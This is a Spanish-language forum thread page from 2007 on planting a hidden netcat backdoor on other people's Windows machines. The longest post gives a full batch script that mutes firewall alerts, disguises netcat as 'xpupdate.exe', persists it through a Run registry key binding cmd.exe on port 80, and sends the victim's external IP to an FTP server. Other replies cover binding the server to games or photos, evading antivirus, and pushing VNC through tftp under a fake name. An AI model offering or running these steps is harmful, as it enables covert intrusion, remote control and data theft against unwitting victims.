elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 276,637 veces)
carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #150 en: 19 Junio 2007, 21:03 pm »

Yo he hecho el server de netcat como dice el manual pero sin poner ningun icono ni nada, se queda con el icono de sfx de winrar. Pero ahora para agregar ese server a un juego o una foto, como lo puedo hacer?

Saludos
En línea

marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #151 en: 19 Junio 2007, 21:09 pm »

Cactus Joiner ...

http://foro.elhacker.net/index.php/topic,131276.0.html
En línea

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #152 en: 19 Junio 2007, 22:20 pm »

me lo he bajado y al abrir el cactus me da un error y me pone:

component "COMDLG32.OCX" or one  of its dependencies not correctly registered: a file is missing or invalid

Alguna idea?
En línea

marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #153 en: 19 Junio 2007, 23:05 pm »

SIII  Leete bien el post del cactus Joiner  ahi mismo viene la solucion

 ;D
En línea

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #154 en: 19 Junio 2007, 23:25 pm »

vale, ya pude, gracias.
« Última modificación: 19 Junio 2007, 23:29 pm por carlipus » En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
Re: Jugando con netcat
« Respuesta #155 en: 19 Junio 2007, 23:51 pm »



   Hay un par de ideas mas que quiero añadir a este tutorial.

  en primer lugar, como creo que no es una buena idea dejar mi ip por ahi puesta para que se conecten a mi (y si tienes ip dinamica ademas debes hacerte de un dominio.....), yo hago lo siguiente:

  Ya nos ha explicado de forma EXCELENTE nuestro amigo en el tutorial como esconder netcat. Además hemos visto como en cierto momento ejecuta un comando durante la extraccion que ademas se hace de forma oculta. Pues yo ejecuto un fichero bat :

Este seria un contenido de ejemplo:

  @echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate  -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:

 netsh --------vamos al modo de control del firewall de xp  ;)

set mode offline---- Le indicamos que desactive las alertas

set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall

copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"  Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.

xpupdate whatismyip.com 80 < html.txt > out.out  Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar   XD…

ftp         Estos pasos solo me envían por ftp esa                    información aunque podríamos hacerlo de muchas otras formas como una web, etc
open                       
ftp.ftp.es
user
pass
ascii
put out.out
bye


xpupdate  -l -d -e cmd.exe -p 80  Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit

El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out  se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.

GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


      Ademas es muy recomendable haber creado la web o ftp de forma anónima usando por ejemplo (Tor+Privoxy+Firefox), y por supuesto acceder a ese ftp,web o como queramos guardar la info de las  ip que sepamos que nos estan esperando con un puerto abierto jejejej

   Sin mas felicitar al creador del tutorial y espero haber inspirado a alguien con estas ideas.

 Saludos


     
En línea

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #156 en: 20 Junio 2007, 11:50 am »

Se podría hacer este servidor de netcat indetectable? por que varios antivirus lo detectan.

Saludos
En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
Re: Jugando con netcat
« Respuesta #157 en: 20 Junio 2007, 12:40 pm »



    Creo que lo mejor seria modificar el codigo fuente lo suficiente como para que los antivirus no lo detecten. Mira tambien la posibilidad de cifrar el archivo para evitar asi la heuristica de antivirus..... de todas formas casi todos los antivirus con la configuración por defecto se lo tragan.....
En línea

pitufooo

Desconectado Desconectado

Mensajes: 105



Ver Perfil
Re: Jugando con netcat
« Respuesta #158 en: 20 Junio 2007, 12:48 pm »

hola

estoy intentando descargar el netcat y siempre me salta el antivirus k a encontrado una herramienta hacker y lla a eliminado.

Ya s k anulando el antivirus m la mpodria descargar, pero si cuando se la ponga a una victima su  antivirus la borra no gano nada.

como dice el compañero no hay alguna forma para k no lo detecten  los antivirus ????

gracias

un saludo
En línea

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #159 en: 20 Junio 2007, 16:35 pm »

Una vez conseguido la shell, para subirle el vnc, pongo:

tftp -i MIIP get WinVNC.exe c:\WINDOWS\system32\gttask.exe

y luego me dice tiempo de espera agotado, por que no va?¿

Saludos.
En línea

Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines